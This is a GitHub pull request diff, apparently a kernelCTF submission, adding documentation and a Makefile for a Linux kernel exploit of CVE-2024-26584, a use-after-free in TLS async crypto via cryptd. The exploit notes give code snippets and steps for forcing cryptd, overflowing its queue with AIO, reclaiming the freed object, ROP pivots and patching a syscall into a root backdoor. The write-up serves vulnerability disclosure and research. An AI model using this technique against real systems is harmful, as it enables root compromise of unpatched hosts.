Skip to content
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
221 changes: 221 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26584_lts_cos/docs/exploit.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,221 @@
## Setup

### TLS setup
To trigger the TLS encryption we must first configure the socket.
This is done using the setsockopt() with SOL_TLS option:

```
static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
err(1, "TLS_TX");

```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In KernelCTF config PCRYPT (parallel crypto engine) is disabled, so our only option to trigger async crypto is CRYPTD (software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand.

As seen in the code snippet above we don't have direct control over which crypto drivers are going to be used in our TLS encryption.
Drivers are selected automatically by Crypto API based on the priority field which is calculated internally to try to choose the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

Following code causes AES CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "skcipher",
.salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa)) < 0)
err(1, "af_alg bind");
```

### User API crypto setup

We'll also use the crypto user API to execute symmetric key cipher operations handled by cryptd.
User API has a more complex setup sequence compared to the TLS.

We need to:
1. Create an AF_ALG socket
2. Bind the sockaddr_alg structure to select the crypto type (skcipher, aead, hash etc) and the algorithm.
3. Call setsockopt with ALG_SET_KEY to set the key.
4. Call accept() on the socket to get the socket that will be used for the actual crypto ops.
5. Call sendmsg() with a prepared message that will contain the message to be encrypted/decrypted, but also a control message selecting the mode (decryption/encryption) and the IV for the operation.
6. Finally recvmsg() is called to trigger the actual crypto operation and get the results.

## Reaching the queue limit of cryptd.

The default queue limit (cryptd.cryptd_max_cpu_qlen) is 1000.
The naive way to reach it would be to just make a lot of TLS or crypto API requests with sendmsg/recvmsg, but we will quickly learn that this is approach is useless, because on each return from the kernel the cryptd will be scheduled and will be process one of our requests, so the queue size will stay basically constant.

We need a way to submit crypto requests without leaving the kernel. This can be done using iouring, but this is disabled on kernelCTF LTS instances.
Instead we'll use a less known async subsystem of the kernel called AIO.
It's much simpler than iouring and only supports read/write/poll/fsync operations, but this is enough for our uses.

Using AIO is very simple, we just need to define operations to be made by using a list of io_cb structures and pass it to io_submit().

To reach the queue limit we just prepare over 1000 user crypto api encryption requests.
User API requests do not set the CRYPTO_TFM_REQ_MAY_BACKLOG flag, so requests over the limit will just be rejected instead of going into backlog mode.
This way we don't have to worry about triggering the vulnerability prematurely.

## Triggering the use-after-free

When the cryptd queue is at the max capacity we just have to call sendmsg() on our TLS socket and this will put our request on the cryptd's backlog.
crypto_aead_encrypt() will return EBUSY, which will lead to the current open TLS record being freed in tls_free_open_rec()/tls_free_rec() before returning from the sendmsg().

TLS record contains the AEAD request:

```
struct tls_rec {
...
struct aead_request aead_req __attribute__((__aligned__(8))); /* 0x678 0x50 */
/* --- cacheline 27 boundary (1728 bytes) was 8 bytes ago --- */
u8 aead_req_ctx[]; /* 0x6c8 0 */
/* size: 1736, cachelines: 28, members: 14 */
};

struct aead_request {
struct crypto_async_request base; /* 0 0x30 */
unsigned int assoclen; /* 0x30 0x4 */
unsigned int cryptlen; /* 0x34 0x4 */
u8 * iv; /* 0x38 0x8 */
struct scatterlist * src; /* 0x40 0x8 */
struct scatterlist * dst; /* 0x48 0x8 */
void * __ctx[] __attribute__((__aligned__(8))); /* 0x50 0 */
/* size: 80, cachelines: 2, members: 7 */
};


```

and this AEAD request is passed to the crypto API in tls_do_encryption() to be queued in cryptd and set as a current backlog request.

When the process returns from the sendmsg() cryptd worker will be scheduled to run on our CPU.
First thing the worker does in cryptd_queue_worker() is to check if there is a backlog request and then call its complete() function with a EINPROGRESS argument:

```
static void cryptd_queue_worker(struct work_struct *work)
{
struct cryptd_cpu_queue *cpu_queue;
struct crypto_async_request *req, *backlog;

...
backlog = crypto_get_backlog(&cpu_queue->queue);
req = crypto_dequeue_request(&cpu_queue->queue);
local_bh_enable();

if (!req)
return;

if (backlog)
backlog->complete(backlog, -EINPROGRESS);


```

'backlog' is a pointer to the crypto_async_request part of the aead_request (which is a part of tls_rec) that was recently freed by the TLS subsystem, so all we have to do to get RCE is to allocate our payload in place of the freed tls_rec object between the return from the TLS sendmsg() and execution of the cryptd_queue_worker().

## Allocating our payload in place of the tls_rec

struct tls_rec has variable size depending on the crypto algorithms used, but in our case is allocated from kmalloc-4096.
We can't use traditional allocation primitives such as xattrs or user keys, because AIO only allows read and writes, but write() called on a connected socket will allocate space for skbuff data using kmalloc if the write length is below 0x1000 - we used a netlink socket, but any socket would do in this case.

## Getting RIP control

Here's what our sequence of AIO operations looks like:

- skcipher socket read 1 (triggering a user API encryption request)
- skcipher socket read 2
- skcipher socket read ...
- skcipher socket read 1000
- TLS socket write triggering a TLS encryption request
- netlink socket write which will put our payload in the recently freed kmalloc-4096 object.

Calling io_submit() executes these operations in given order and before returning to the userspace cryptd will call a function pointer under our control (at offset 0x10 of the crypto_async_request).

```
struct crypto_async_request {
struct list_head list; /* 0 0x10 */
crypto_completion_t complete; /* 0x10 0x8 */
void * data; /* 0x18 0x8 */
struct crypto_tfm * tfm; /* 0x20 0x8 */
u32 flags; /* 0x28 0x4 */

/* size: 48, cachelines: 1, members: 5 */
};

```

## Pivot to ROP

complete() function is called with the pointer to crypto_async_request in the RDI.

Three gadgets are needed to pivot to the ROP chain:

```
mov r8, qword ptr [rdi + 0xc8]
mov eax, 1
test r8, r8
je 0xffffffff81ed2b71
mov rsi, rdi
mov rcx, r14
mov rdi, rbp
mov rdx, r15
call __x86_indirect_thunk_r8
```

which copies RDI to RSI

```
push rsi
jmp qword ptr [rsi + 0x66]
```

and
```
pop rsp
```

## Second pivot

At this point we have full ROP, but our space is limited.
To have enough space to execute all privilege escalation code we have to pivot again.
This is quite simple - we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
Then we use a `pop rsp ; ret` gadget to pivot there.

## Privilege escalation

Our ROP is executed from the cryptd kernel thread context, so we can't do a traditional commit_creds() to modify the current process's privileges.

We could try locating our exploit process and changing its privileges, but we decided to go with a different approach - we patch the kernel creating a backdoor that will grant root privileges to any process that executes a given syscall.

We chose a rarely used kexec_file_load() syscall and overwrote its code with our get_root function that does all traditional privileges escalation/namespace escape stuff: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy) etc.

This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised.

Patching the kernel function is done rop_patch_kernel_code() - it calls set_memory_rw() on destination memory and uses copy_user_generic() to write new code there.
27 changes: 27 additions & 0 deletions pocs/linux/kernelctf/CVE-2024-26584_lts_cos/docs/vulnerability.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and CONFIG_CRYPTO_CRYPTD
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=94524d8fc965a7a0facdef6d1b01d5ef6d71a802

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8590541473188741055d27b955db0777569438e3

## Affected kernel versions

Introduced in 4.2. Fixed in 6.1.78, 5.15.159 and other stable trees.

## Affected component, subsystem

net/tls

## Description

When TLS submits a request in async mode to the crypto API, this request is handled by cryptd and number of queued requests exceeds the maximum queue size (cryptd.cryptd_max_cpu_qlen) the API will enter "backlog mode" which has several consequences:

- crypto_aead_decrypt()/crypto_aead_encrypt() returns EBUSY which the TLS subsystem treats as a fatal error, causing the kfree() to be called on all of the TLS context, including the AEAD request object that is still being referenced in the cryptd queue (use-after-free).
- cryptd will call the async callback (tls_encrypt_done/tls_decrypt_done) twice, first with err == EINPROGRES and later with the actual error status of the finished request. TLS callbacks are not prepared for this extra call, which leads to a double free when tls_decrypt_done() released physical pages used for storing cleartext and freed the AEAD request context object twice.
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
INCLUDES =
LIBS = -pthread -ldl -laio
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17412.294.10.h kaslr.c
gcc -o $@ exploit.c kaslr.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
sudo apt-get install libkeyutils-dev libaio-dev
Binary file not shown.
Loading
Loading